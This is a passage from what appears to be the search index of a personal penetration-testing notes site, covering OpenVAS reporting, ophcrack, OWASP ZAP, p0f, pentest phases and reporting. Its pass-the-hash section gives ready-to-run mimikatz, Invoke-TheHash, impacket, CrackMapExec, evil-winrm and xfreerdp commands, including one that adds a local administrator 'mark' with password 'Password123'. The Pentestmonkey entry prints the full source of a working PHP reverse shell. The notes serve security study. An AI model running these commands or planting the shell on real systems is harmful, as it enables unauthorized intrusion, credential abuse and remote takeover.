    There are various export formats for reporting purposes, including XML, CSV, PDF, ITG, and TXT. If you choose to export your report out as an XML, you can leverage various XML parsers to view the data in an easier to read format.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#reporting","title":"Reporting","text":"

    See openVAS Reporting.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvasreporting/","title":"openVAS Reporting","text":"","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/TheGroundZero/openvasreporting.

    # Install Python3 and pip3 before.\n\n# Clone git repository\ngit clone https://github.com/TheGroundZero/openvasreporting.git\n\n# Install required python packages\ncd openvasreporting\npip3 install pip --upgrade\npip3 install build --upgrade\npython -m build\n\n# Install module\npip3 install dist/OpenVAS_Reporting-X.x.x-py3-xxxx-xxx.whl\n

    Alternative with pip3

    # Install Python3 and pip3\napt(-get) install python3 python3-pip # Debian\n\n# Install the package\npip3 install OpenVAS-Reporting\n
    ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#basic-usage","title":"Basic usage","text":"
    python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx\n
    ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"operating-systems/","title":"Repo for legacy Operating system","text":"","tags":["resources"]},{"location":"operating-systems/#old-version-of-windows","title":"Old version of Windows","text":"

    From Windows 1.0 DR 5 to nowadays ISOs: https://osvault.weebly.com/windows-beta-repository.html

    ","tags":["resources"]},{"location":"operating-systems/#windows-servers","title":"Windows servers","text":"","tags":["resources"]},{"location":"operating-systems/#-windows-server-2019-httpswwwmicrosoftcomes-esevalcenterdownload-windows-server-2019","title":"- Windows Server 2019: https://www.microsoft.com/es-es/evalcenter/download-windows-server-2019.","text":"","tags":["resources"]},{"location":"ophcrack/","title":"ophcrack - A windows password cracker based on rainbow tables","text":"

    Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

    ","tags":["pentesting","password cracker"]},{"location":"ophcrack/#installation","title":"Installation","text":"

    Download from https://ophcrack.sourceforge.io/.

    ","tags":["pentesting","password cracker"]},{"location":"owasp-zap/","title":"OWASP zap","text":"

    To launch it, run:

    zaproxy\n

    You can do several things:

    • Run an automatic attack.
    • Import your spec.yml file and run an automatic attack.
    • Run a manual attack.

    The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

    "},{"location":"owasp-zap/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

    Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

    After that, OWASP Zap allows you to narrow the results to your target. How? In the Sites module, right click on your site and select \"Include in context\". After that, click on the icon shaped as a \"target\" to filter out sites by context.

    With the results, start your analysis and remove false-negative vulnerabilities.

    "},{"location":"owasp-zap/#interesting-addons","title":"Interesting addons","text":"

    Update all your addons when opening ZAP for the first time.

    • Treetools
    • Reflect
    • Revisit
    • Directory List v.2.3
    • Wappalyzer
    • Python Scripting
    • Passive scanner rules
    • FileUpload
    • Regular Expression tester.
    "},{"location":"p0f/","title":"P0f","text":"

    P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. Version 3 is a complete rewrite of the original codebase, incorporating a significant number of improvements to network-level fingerprinting, and introducing the ability to reason about application-level payloads (e.g., HTTP).

    ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#installation","title":"Installation","text":"

    Download from: https://lcamtuf.coredump.cx/p0f3/.

    ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#_1","title":"p0f","text":"","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"pass-the-hash/","title":"Pass The Hash","text":"

    With NTLM, passwords stored on the server and domain controller are not \"salted,\" which means that an adversary with a password hash can authenticate a session without knowing the original password. A Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-mimikatz-windows","title":"Pass the Hash with Mimikatz (Windows)","text":"

    see mimikatz

    # Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we canuse cmd.exe to execute commands in the user's context. \n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-powershell-invoke-thehash-windows","title":"Pass the Hash with PowerShell Invoke-TheHash (Windows)","text":"

    See Powershell Invoke-TheHash. This tool is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

    When using Invoke-TheHash, we have two options: SMB or WMI command execution.

    cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
    Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

    How to generate a reverse shell.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
    Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

    How to generate a reverse shell.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-linux","title":"Pass the Hash with Impacket (Linux)","text":"","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-psexec","title":"Pass the Hash with Impacket PsExec","text":"
    impacket-psexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-wmiexec","title":"Pass the Hash with impacket-wmiexec","text":"

    Download from: https://github.com/fortra/impacket/blob/master/examples/wmiexec.py.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-atexec","title":"Pass the Hash with impacket-atexec","text":"

    Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-smbexec","title":"Pass the Hash with impacket-smbexec","text":"

    Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-crackmapexec-linux","title":"Pass the Hash with CrackMapExec (Linux)","text":"

    See CrackMapExec

    # Using a hash instead of a password, to authenticate ourselves\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-evil-winrm-linux","title":"Pass the Hash with evil-winrm (Linux)","text":"

    See evil-winrm.

    If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine.

    evil-winrm -i $ip -u <username> -H <hash>\n
    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-rdp-linux","title":"Pass the Hash with RDP (Linux)","text":"
    xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n

    Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

    reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

    Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

    ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#uac-limits-pass-the-hash-for-local-accounts","title":"UAC Limits Pass the Hash for Local Accounts","text":"

    UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

    Note: There is one exception, if the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID 500 account (even if it is renamed) is enrolled in UAC protection. This means that remote PTH will fail against the machine when using that account. \u00b4

    ","tags":["privilege escalation","windows"]},{"location":"pdm/","title":"pdm - A python package and dependency manager","text":""},{"location":"pdm/#installation","title":"Installation","text":"

    PDM, as described, is a modern Python package and dependency manager supporting the latest PEP standards. But it is more than a package manager. It boosts your development workflow in various aspects. The most significant benefit is it installs and manages packages in a similar way to npm that doesn't need to create a virtualenv at all

    curl -sSL https://raw.githubusercontent.com/pdm-project/pdm/main/install-pdm.py | python3 -\n
    "},{"location":"penetration-testing-process/","title":"Penetration Testing Process: A General Approach to the Profession","text":"Sources for these notes
    • Hack The Box: Penetration Testing Learning Path
    • INE eWPT2 Preparation course

    Resources:

    • https://pentestreports.com/
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-penetration-testing","title":"Types of Penetration Testing","text":"Type Information Provided BlackboxMinimal. Only the essential information, such as IP addresses and domains, is provided. GreyboxExtended. In this case, we are provided with additional information, such as specific URLs, hostnames, subnets, and similar. WhiteboxMaximum. Here everything is disclosed to us. This gives us an internal view of the entire structure, which allows us to prepare an attack using internal information. We may be given detailed configurations, admin credentials, web application source code, etc. Red-Teaming May include physical testing and social engineering, among other things. Can be combined with any of the above types. Purple-Teaming It can be combined with any of the above types. However, it focuses on working closely with the defenders.","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#types-of-testing-environments","title":"Types of Testing Environments","text":"

    Apart from the test method and the type of test, another consideration is what is to be tested, which can be summarized in the following categories:

    Network Web App Mobile API Thick Clients IoT Cloud Source Code Physical Security Employees Hosts Server Security Policies Firewalls IDS/IPS","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#phases","title":"Phases","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#pre-engagement","title":"Pre-engagement","text":"

    The pre-engagement phase of a penetration testing is a crucial step that lays the foundation for a successful and well-planned security assessment. It involves preliminary preparations, understanding project requirements, and obtaining necessary authorizations before initiating the actual testing. During the pre-engagement phase, the penetration tester and the client must discuss and agree upon a number of legal and technical details pertinent to the execution and outcomes of the security assessment.

    This can be one or more documents with the objective to define the following:

    • Objectives:: Clearly define the objectives and goals of the penetration test. Understand what the stakeholders aim to achieve through the testing process.
    • Scope of the engagement: Identify the scope of the penetration test, including the specific web applications, URLs, and functionalities to be tested. Define the scope boundaries and limitations, such as which systems or networks are out-of-scope for testing.
    • Timeline & milestones
    • Liabilities & responsibility: Obtain proper authorization from the organization's management or application owners to conduct the penetration test. Ensure that the testing activities comply with any legal or regulatory requirements, and that all relevant permissions are secured.
    • Rules of Engagement (RoE): Establish a set of Rules of Engagement that outline the specific rules, constraints, and guidelines for the testing process. Include details about the testing schedule, testing hours, communication channels, and escalation procedures.
    • Communication and Coordination: Establish clear communication channels with key stakeholders, including IT personnel, development teams, and management. Coordinate with relevant personnel to ensure minimal disruption to the production environment during testing.
    • Expectations and deliverables
    • Statement of work
    • The Scoping Meeting: Conduct a scoping meeting with key stakeholders to discuss the testing objectives, scope, and any specific concerns or constraints. Use this meeting to clarify expectations and ensure everyone is aligned with the testing approach.
    • List of documents so far:
    Document Timing for Creation Non-Disclosure Agreement (NDA) After Initial Contact Scoping Questionnaire Before the Pre-Engagement Meeting Scoping Document During the Pre-Engagement Meeting Penetration Testing Proposal (Contract/Scope of Work (SoW)) During the Pre-engagement Meeting Rules of Engagement (RoE) Before the Kick-Off Meeting Contractors Agreement (Physical Assessments) Before the Kick-Off Meeting Reports During and after the conducted Penetration Test
    • Risk Assessment and Acceptance: Perform a risk assessment to understand the potential impact of the penetration test on the web application and the organization. Obtain management's acceptance of any risks associated with the testing process.
    • Engagement Kick-off: Officially kick-off the penetration test, confirming the start date and timeline with the organization's stakeholders. Share the RoE and any other relevant details with the testing team.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#information-gathering","title":"Information gathering","text":"

    We could tell 4 categories:

    • Open-Source Intelligence
    • Infrastructure Enumeration
    • Service Enumeration
    • Host Enumeration

    A different way to approach to footprinting is considering the following layers:

    Layer Description Information Categories 1. Internet Presence Identification of internet presence and externally accessible infrastructure. Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures 2. Gateway Identify the possible security measures to protect the company's external and internal infrastructure. Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare 3. Accessible Services Identify accessible interfaces and services that are hosted externally or internally. Service Type, Functionality, Configuration, Port, Version, Interface 4. Processes Identify the internal processes, sources, and destinations associated with the services. PID, Processed Data, Tasks, Source, Destination 5. Privileges Identification of the internal permissions and privileges to the accessible services. Groups, Users, Permissions, Restrictions, Environment 6. OS Setup Identification of the internal components and systems setup. OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cloud-resources","title":"Cloud resources","text":"

    Often cloud storage is added to the DNS list when used for administrative purposes by other employees.

    for i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f1,4;done\n

    More ways to find cloud storage:

    google dork:

    # Google search for AWS\nintext: example.com inurl:amazonaws.com\n\n# Google search for Azure\nintext: example.com inurl:blob.core.windows.net\n

    Source code from the application: For instance

    <link rel='dns-prefetch' href=\"//example.blob.core.windows.net\">\n

    domain.glass service also provides cloud search services for a passive reconnaissance.

    GrayHatWarfare is also noticeable. With this tool you can filter private and public keys leaked.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#vulnerability-assessment","title":"Vulnerability assessment","text":"

    During the vulnerability assessment phase, we examine and analyze the information gathered during the information gathering phase. In Vulnerability Research, we look for known vulnerabilities, exploits, and security holes that have already been discovered and reported. After that, we should mirror the target system locally as precisely as possible to replicate our testing locally.

    The purpose of a Vulnerability Assessment is to understand, identify, and categorize the risk for the more apparent issues present in an environment without actually exploiting them to gain further access.

    Types of tests: black box, gray box and white box.

    Specializations:

    • Application pentesters.
    • Network or infraestructure pentesters.
    • Physical pentesters.
    • Social engineering pentesters.

    Types of Security assessments:

    • Vulnerability assessment.
    • Penetration test.
    • Security audits.
    • Bug bounties.
    • Red team assessments.
    • Purple team assessments.

    Vulnerability Assessments and Penetration Tests are two completely different assessments. Vulnerability assessments look for vulnerabilities in networks without simulating cyber attacks. Penetration tests, depending on their type, evaluate the security of different assets and the impact of the issues present in the environment.

    Source: HTB Academy and predatech.co.uk

    Compliance standards

    • Payment Card Industry Data Security Standard (PCI DSS).
    • Health Insurance Portability and Accountability Act (HIPAA).
    • Federal Information Security Management Act (FISMA).
    • ISO 27001.
    • The NIST (National Institute of Standards and Technology) is well known for their NIST Cybersecurity Framework.
    • OWASP stands for the Open Web Application Security Project:
      • Web Security Testing Guide (WSTG)
      • Mobile Security Testing Guide (MSTG)
      • Firmware Security Testing Methodology

    Frameworks for Pentesting:

    • Penetration Testing Execution Standard (PTES).
    • Open Source Security Testing Methodology Manual (OSSTMM).
    • Common Vulnerability Scoring System (CVSS).
    • Common Vulneravilities and Exposures.

    Scanners: OpenVAS, Nessus, Nexpose, and Qualys.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#exploitation","title":"Exploitation","text":"

    Once we have set up the system locally and installed known components to mirror the target environment as closely as possible, we can start preparing the exploit by following the steps described in the exploit. Then we test this on a locally hosted VM to ensure it works and does not damage significantly.

    • Transferring File Techniques: Linux.
    • Transferring File Techniques: Windows
    • Transferring files with code.
    • File Encryption: windows and linux .
    • LOLbins - \"Living off the land\" binaries: LOLbas and GTFObins.
    • Evading detection in file transfers.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-exploitation","title":"Post-exploitation","text":"

    The Post-Exploitation stage aims to obtain sensitive and security-relevant information from a local perspective and business-relevant information that, in most cases, requires higher privileges than a standard user. This stage includes the following components:

    • Evasive Testing: watch out with running commands such as net user or whoami that is often monitored by EDR systems and flagged as anomalous activity. Three methods: Evasive, Hybrid evasive, and Non-evasive.
    • Information Gathering. The information gathering stage starts all over again from the local perspective. We also enumerate the local network and local services such as printers, database servers, virtualization services, etc.
    • Pillaging. Pillaging is the stage where we examine the role of the host in the corporate network. We analyze the network configurations, including but not limited to: Interfaces, Routing, DNS, ARP, Services, VPN, IP Subnets, Shares, Network Traffic.
    • Vulnerability Assessment: it is essential to distinguish between exploits that can harm the system and attacks against the services that do not cause any disruption.
    • Privilege Escalation
    • Persistence
    • Data Exfiltration: During the Information Gathering and Pillaging stage, we will often be able to find, among other things, considerable personal information and customer data. Some clients will want to check whether it is possible to exfiltrate these types of data. This means we try to transfer this information from the target system to our own.
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#lateral-movement","title":"Lateral movement","text":"

    In this stage, we want to test how far we can move manually in the entire network and what vulnerabilities we can find from the internal perspective that might be exploited. In doing so, we will again run through several phases:

    1. Pivoting
    2. Evasive Testing: There are many ways to protect against lateral movement, including network (micro) segmentation, threat monitoring, IPS/IDS, EDR, etc. To bypass these efficiently, we need to understand how they work and what they respond to. Then we can adapt and apply methods and strategies that help avoid detection.
    3. Information Gathering
    4. Vulnerability Assessment
    5. (Privilege) Exploitation
    6. Post-Exploitation
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#proof-of-concept","title":"Proof-Of-Concept","text":"

    Proof of Concept (PoC) or Proof of Principle is a project management term. In project management, it serves as proof that a project is feasible in principle.

    A PoC can have many different representations. For example, documentation of the vulnerabilities found can also constitute a PoC. The more practical version of a PoC is a script or code that automatically exploits the vulnerabilities found. This demonstrates the flawless exploitation of the vulnerabilities. This variant is straightforward for an administrator or developer because they can see what steps our script takes to exploit the vulnerability.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#post-engagement","title":"Post-Engagement","text":"","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#cleanup","title":"Cleanup","text":"

    Cleanup: Once testing is complete, we should perform any necessary cleanup, such as deleting tools/scripts uploaded to target systems, reverting any (minor) configuration changes we may have made, etc. We should have detailed notes of all of our activities, making any cleanup activities easy and efficient.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#reporting","title":"Reporting","text":"

    Documentation and Reporting: Before completing the assessment and disconnecting from the client's internal network or sending \"stop\" notification emails to signal the end of testing, we must make sure to have adequate documentation for all findings that we plan to include in our report. This includes command output, screenshots, a listing of affected hosts, and anything else specific to the client environment or finding.

    Typical parts of a report:

    • Executive Summary: The report typically begins with an executive summary, which is a high-level overview of the key findings and the overall security posture of the web application. It highlights the most critical vulnerabilities, potential risks, and the impact they may have on the business. This section is designed for management and non-technical stakeholders to provide a quick understanding of the test results.
    • Scope and Methodology: This section provides a clear description of the scope of the penetration test, including the target application, its components, and the specific testing activities performed. It also outlines the methodologies and techniques used during the assessment to ensure transparency and understanding of the testing process.
    • Findings and Vulnerabilities: The core of the penetration test report is the detailed findings section. Each identified vulnerability is listed, along with a comprehensive description of the issue, the steps to reproduce it, and its potential impact on the application and organization. The vulnerabilities are categorized based on their severity level (e.g., critical, high, medium, low) to prioritize remediation efforts.
    • Proof of Concept (PoC): For each identified vulnerability, the penetration tester includes a proof of concept (PoC) to demonstrate its exploitability. The PoC provides concrete evidence to support the validity of the findings and helps developers understand the exact steps required to reproduce the vulnerability.
    • Risk Rating and Recommendations: In this section, the vulnerabilities are further analyzed to determine their risk rating and potential impact on the organization. The risk rating takes into account factors such as likelihood of exploitation, ease of exploit, potential data exposure, and business impact. Additionally, specific recommendations and best practices are provided to address and mitigate each vulnerability.
    • Remediation Plan: The report should include a detailed remediation plan outlining the steps and actions required to fix the identified vulnerabilities. This plan helps guide the development and IT teams in prioritizing and addressing the security issues in a systematic manner.
    • Additional Recommendations: In some cases, the report may include broader recommendations for improving the overall security posture of the web application beyond the identified vulnerabilities. These may include implementing security best practices, enhancing security controls, and conducting regular security awareness training.
    • Appendices and Technical Details: Supporting technical details, such as HTTP requests and responses, server configurations, and logs, may be included in appendices to provide additional context and evidence for the identified vulnerabilities.

    Resources:

    • https://pentestreports.com/
    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#report-review-meeting","title":"Report Review Meeting","text":"

    Report Review Meeting: Once the draft report is delivered, and the client has had a chance to distribute it internally and review it in-depth, it is customary to hold a report review meeting to walk through the assessment results.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"penetration-testing-process/#deliverable-acceptance","title":"Deliverable Acceptance","text":"

    Deliverable Acceptance: Once the client has submitted feedback (i.e., management responses, requests for clarification/changes, additional evidence, etc.) either by email or (ideally) during a report review meeting, we can issue them a new version of the report marked FINAL

    Post-Remediation Testing: Most engagements include post-remediation testing as part of the project's total cost. In this phase, we will review any documentation provided by the client showing evidence of remediation or just a list of remediated findings.

    Since a penetration test is essentially an audit, we must remain impartial third parties and not perform remediation on our findings (such as fixing code, patching systems, or making configuration changes in Active Directory). After a penetration test concludes, we will have a considerable amount of client-specific data such as scan results, log output, credentials, screenshots, and more. We should retain evidence for some time after the penetration test in case questions arise about specific findings or to assist with retesting \"closed\" findings after the client has performed remediation activities. Any data retained after the assessment should be stored in a secure location owned and controlled by the firm and encrypted at rest.

    ","tags":["pentesting","CPTS","eWPT"]},{"location":"pentesmonkey/","title":"Pentesmonkey php reverse shell","text":"Resources to generate reverse shells
    • https://www.revshells.com/
    • Netcat for windows 32/64 bit
    • Pentesmonkey
    • PayloadsAllTheThings

    Additionally, have a look at \"notes on reverse shells\"

    Download Pentesmonkey from github: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php.

    <?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  The author accepts no liability\n// for damage caused by this tool.  If these terms are not acceptable to you, then\n// do not use this tool.\n//\n// In all other respects the GPL version 2 applies:\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License version 2 as\n// published by the Free Software Foundation.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License along\n// with this program; if not, write to the Free Software Foundation, Inc.,\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n//\n// This tool may be used for legal purposes only.  Users take full responsibility\n// for any actions performed using this tool.  If these terms are not acceptable to\n// you, then do not use this tool.\n//\n// You are encouraged to send comments, improvements or suggestions to\n// me at pentestmonkey@pentestmonkey.net\n//\n// Description\n// -----------\n// This script will make an outbound TCP connection to a hardcoded IP and port.\n// The recipient will be given a shell running as the current user (apache normally).\n//\n// Limitations\n// -----------\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.\n//\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '127.0.0.1';  // CHANGE THIS\n$port = 1234;       // CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n\n// pcntl_fork is hardly ever available, but will allow us to daemonise\n// our php process and avoid zombies.  Worth a try...\nif (function_exists('pcntl_fork')) {\n    // Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n        printit(\"ERROR: Can't fork\");\n        exit(1);\n    }\n\n    if ($pid) {\n        exit(0);  // Parent exits\n    }\n\n    // Make the current process a session leader\n    // Will only succeed if we forked\n    if (posix_setsid() == -1) {\n        printit(\"Error: Can't setsid()\");\n        exit(1);\n    }\n\n    $daemon = 1;\n} else {\n    printit(\"WARNING: Failed to daemonise.  This is quite common and not fatal.\");\n}\n\n// Change to a safe directory\nchdir(\"/\");\n\n// Remove any umask we inherited\numask(0);\n\n//\n// Do the reverse shell...\n//\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n    printit(\"$errstr ($errno)\");\n    exit(1);\n}\n\n// Spawn shell process\n$descriptorspec = array(\n   0 => array(\"pipe\", \"r\"),  // stdin is a pipe that the child will read from\n   1 => array(\"pipe\", \"w\"),  // stdout is a pipe that the child will write to\n   2 => array(\"pipe\", \"w\")   // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n    printit(\"ERROR: Can't spawn shell\");\n    exit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n    // Check for end of TCP connection\n    if (feof($sock)) {\n        printit(\"ERROR: Shell connection terminated\");\n        break;\n    }\n\n    // Check for end of STDOUT\n    if (feof($pipes[1])) {\n        printit(\"ERROR: Shell process terminated\");\n        break;\n    }\n\n    // Wait until a command is end down $sock, or some\n    // command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    // If we can read from the TCP socket, send\n    // data to process's STDIN\n    if (in_array($sock, $read_a)) {\n        if ($debug) printit(\"SOCK READ\");\n        $input = fread($sock, $chunk_size);\n        if ($debug) printit(\"SOCK: $input\");\n        fwrite($pipes[0], $input);\n    }\n\n    // If we can read from the process's STDOUT\n    // send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n        if ($debug) printit(\"STDOUT READ\");\n        $input = fread($pipes[1], $chunk_size);\n        if ($debug) printit(\"STDOUT: $input\");\n        fwrite($sock, $input);\n    }\n\n    // If we can read from the process's STDERR\n    // send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n        if ($debug) printit(\"STDERR READ\");\n        $input = fread($pipes[2], $chunk_size);\n        if ($debug) printit(\"STDERR: $input\");\n        fwrite($sock, $input);\n    }\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n    if (!$daemon) {\n        print \"$string\\n\";\n    }\n}\n\n?> \n
    ","tags":["reverse shell","php"]},{"location":"pentesting-network-services/","title":"Pentesting network services","text":"

    Port numbers range from 1 to 65,535, with the range of well-known ports 1 to 1,023 being reserved for privileged services. Port 0 is a reserved port in TCP/IP networking and is not used in TCP or UDP messages. If anything attempts to bind to port 0 (such as a service), it will bind to the next available port above port 1,024 because port 0 is treated as a \"wild card\" port.

    See Pentesting network services.

    To locate easily one: https://www.cheatsheet.wtf/PortNumbers/

    All ports in raw: https://raw.githubusercontent.com/maraisr/ports-list/master/all.csv.

